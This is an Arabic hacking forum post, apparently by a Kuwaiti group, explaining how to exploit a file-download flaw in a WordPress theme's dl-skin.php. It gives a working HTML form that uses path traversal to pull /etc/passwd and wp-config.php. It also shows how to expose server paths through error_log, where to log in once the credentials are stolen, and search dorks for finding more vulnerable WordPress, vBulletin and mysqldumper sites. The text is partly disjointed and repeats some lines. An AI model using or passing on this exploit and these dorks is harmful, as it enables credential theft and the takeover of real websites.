شرح ثغره سكربت Wordpress 2014 وتصميم هكركوز الكويت لتنزيل config.php البيانات بلا تعقيد واختراق موفق ولسكربتات اخره تابع الشرح
الثغره مخصص لسكربت " وورد " ونتابع البقيهـ
Wordpress وورد
صاحب الثغره المكتشف
تم رفع الخدمه <<< بويب
htm
تنزيل الخدمهـ
لـ passwd
Hs-kw
و
لـ wp-config
Hs-kw9
وعليك التغير فقط برابط الكود الموجود لمسار الموقع المستهدف وتغير الامر نشاهد المثال
<html> <body> <form action="http://127.0.0.1/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="POST"> <b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br> < input type="submit" value=Download> </form> </body> </html>
او تضيف هذا الامر :-
../../../../../wp-config.php
بدل
/etc/passwd
وهذا الامر للاستغلال
lib/scripts/dl-skin.php
والدخول للوحه التحكم عند اخذ البيانات لتجربهـ
wp-login.php?action=lostpassword
wp-admin
wp-admin
وطريقه اخره مني لكم / لتأكد من اليوزر نيم لموقع كتالي
نضيف هذا المسار
wp-content/themes/elegance/lib/scripts/error_log
لنكشف مسار اليوزر نيم
home5/hkrkoz/public_html/wp-content
wp-content/themes/elegance/lib/scripts/error_log
لنكشف مسار اليوزر نيم
home5/hkrkoz/public_html/wp-content
وهذا مقطع فيديو مشروح التطبيق <<<
الحين امر البحث عن المواقع المركبين السكربت ؟
Proudly powered by WordPress
و
wp-admin/install.php
و
wp-admin/theme-editor.php
و
لعرب الجرب التالي
كافة الحقوق محفوظة لموقع عرب ووردبريس
و
كافة الحقوق محفوظة . | بإستخدام WordPress |
ودخلت مزاجي الفكره بالدخول لسكربتات اخره كتجربهـ كمثال
mysqldumper
تضيف التالي ؟
work/config/mysqldumper.conf.php
config.php
config.php
و
Powered by vBulletin® Version
وهنا تضيف التالي ؟
vb/includes/config.php
========================
Xtreme Outdoors Ministry › Log In
Added by WP-Cache Manager
"robots.txt" "mysqldumper:" filetype:txt
Xtreme Outdoors Ministry › Log In
Added by WP-Cache Manager
"robots.txt" "mysqldumper:" filetype:txt
والسلام ختام